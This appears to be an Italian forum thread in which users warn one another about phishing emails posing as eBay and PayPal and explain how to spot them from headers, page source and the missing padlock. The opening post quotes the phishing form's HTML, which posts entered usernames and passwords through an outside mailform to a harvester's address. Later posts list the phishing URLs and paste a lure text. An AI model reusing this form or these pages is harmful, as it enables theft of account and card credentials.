eBay

piccola guida contro le mail spoof?

Eccola:
ho ricevuto una mail di ricente da parte di "ebay" in cui mi veniva chiesto di compilare il modulo HTML nella mail e confermare per inviare la mail ad "ebay" altrimenti in 24h sarebbe stato disattivato l'account.

Come procedere:

1) ogni client di posta (Outlook, Thunderbird ecc) consente di leggere le "intestazioni" (che nn vengono normalmente mostrate perchè sono dettagli molto-tecnici), quella della mail fittizia è:
Mittente --> "from Pc3 (81.196.xxx.xxx) by smtp7.libero.it" si puo' subito capire che nn proviene da ebay ma è stata inviata da LIBERO, seppur il mittente che si legge normalmente è: "aw-confirm@ebay.com" (con un semplice programmino ci si puo' spacciare per ki si vuole, ma nn nell'intestazione).

2) leggere sempre, in caso di dubbi, il sorgente della mail. Nel form HTML che dovevo compilare, al CLICK del mouse su CONFERMA veniva eseguita questa azione utilizzando dei campi di testo nascosi nella pagina (il carattere # sostituisce il MINORE e MAGGIORE):

#FORM action="http://www.ok.ee/cgi-bin/ok_mailform.cgi" method=post##INPUT type=hidden size=-1 value=grasu_andrea@yahoo.com name=recip##INPUT type=hidden size=-1 value=http://signin.ebay.com/ws2/eBayISAPI.dll?SignIn&ssPageName=h:h:sin:US name=followup-page#

utilizzando Javascript, la pagina manda una mail all'indirizzo "grasu_andrea@yahoo.com" con i dati inseriti (casualmente anche USERNAME e PASSWORD) che vengono verificati prima inviandoli alla pagina "http://signin.ebay...ecc..." per confermare se sono giusti.

detto questo, credo ke sia sufficiente nel 99,99% dei casi per nn cadere in trappola. Questa mini-mini guida puo' valere per qualsiasi altra mail/servizio.

fate attenzione,
emandt

ne ho ricevute 5 in nelle ultime 3 settimane, le ho segnalate tutte ad ebay ma inizio a preoccuparmi vista la frequenza

Anke a me è arrivata una mail spoof, aveva un link ke cominciava con signin.ebay.it e mi faceva capire il bisogno di reinserire i miei dati di account e quelli della carta di credito perkè la mia banca l'aveva bloccata. Sono stato un po' titubante anke xkè la mia carta di credito è una PostePay, ma alla fine (visto anke ke il link mi riportava sul sito ebay) ho clikkato e mi ha portato su una pagina dove avevo cominciato a inserirei dati. Fortunatamente mi sono accorto ke in basso a destra non era comparso il lukkettino (simbolo ke sta a significare l'arrivo su una pagina ke è protetta da un sistema di criptatura) ke è sempre presente su Ebay quando siamo in pagine dove va inserito qualsiasi tipo di codice. L'ho inviata a Ebay e mi ha confermato ke la mail era falsa. E' buona norma ke controlliate sempre questa piccola cosa quando siete in pagine dove inserite delle password.
Ciao a tutti e buone aste!!!

Enea

VA Bè.... io sono un attimo sconvolto...
ma la cosa più tranquy sembra usare questo Toolbar,di cui non sò ancora praticamente nulla...
provvedo subito...
MA NON CAPISCO XKè EBAY (QUELLO VERO!!!!) CON TUTTI I SOLDI KE Fà..
NON PUO DEDICARSI A EVITARE COSE DEL GENERE...
SE LA GENTE RISCHIA COSì GROSSO,KE CONTINUA A USARE IL SITO????

anche a me sono arrivate 2 mail strane che non ho aperto, ma qui che casino è??!!!!mi conviene andarmene da e-bay anche perche' non ci capisco niente e mi sembra tutto complicato.....vado a comprare a negozio.!!!!!!

mi e' arrivata una e-mail contraffatta e mi sono lasciato ingannare come un bambino inserendo i miei dati personali compreso quelli della carta di credito che utilizzo per pagare con Paypal.Ho gia'inviato la mail al servizio clienti di e-Bay e ho contattato il numero verde della banca per bloccare la carta di credito i quali mi hanno risposto che la carta di credito si puo' bloccare solo per furto o smarrimento ma non per truffe online.... che devo fare per evitare tristi sorprese? Prego AIUTATEMI!!!!!!

Salve! Sono un nuovo utente di ebay.
Oggi mi è arrivata una mail, apparentemente inviata da paypal (mittente:services@paypal.com)
Il testo è il seguente:

It has come to our attention that your PayPal Billing Information records are out of date. That requires you to update the Billing Information.
Failure to update your records will result in account termination. Please update your records in maximum 24 hours. Once you have updated your account records, your PayPal session will not be interrupted and will continue as normal. Failure to update will result in cancellation of service, Terms of Service (TOS) violations or future billing problems.
Please click here to update your billing records.

Cliccando sul link si apre una pagina all'indirizzo It has come to our attention that your PayPal Billing Information records are out of date. That requires you to update the Billing Information.
Failure to update your records will result in account termination. Please update your records in maximum 24 hours. Once you have updated your account records, your PayPal session will not be interrupted and will continue as normal. Failure to update will result in cancellation of service, Terms of Service (TOS) violations or future billing problems.
Please click here to update your billing records.

Cliccando sul link si apre una pagina all'indirizzo http://brain.com.pk/redirect.htm e poi...dopo qualche secondo si apre questa pagina
http://203.230.169.12/~stw/paypal/update.htm?=https://www.paypal.com/=cmd_login_access_account_uptead_curreny%%%dir#28user298sdfsdfsdfsdf32394%%%

E' singolare che vengano chiesti dati relativi alle carte di credito in una connessione non protetta.
A me sembra tanto una truffa.
Voi che ne pensate?

Anche a me sono arrivate parecchie di queste mail sia da un falso ebay sia da paypal. Che cosa mi ha insospettito? Io uso come metotodo di pagamento solo vaglia postale e non sono registrato in paypal. Comunque è buona norma non aprire link su mail di cui non è certa la provenienza (se sono registrato solo in Italia le mail in inglese non hanno senso).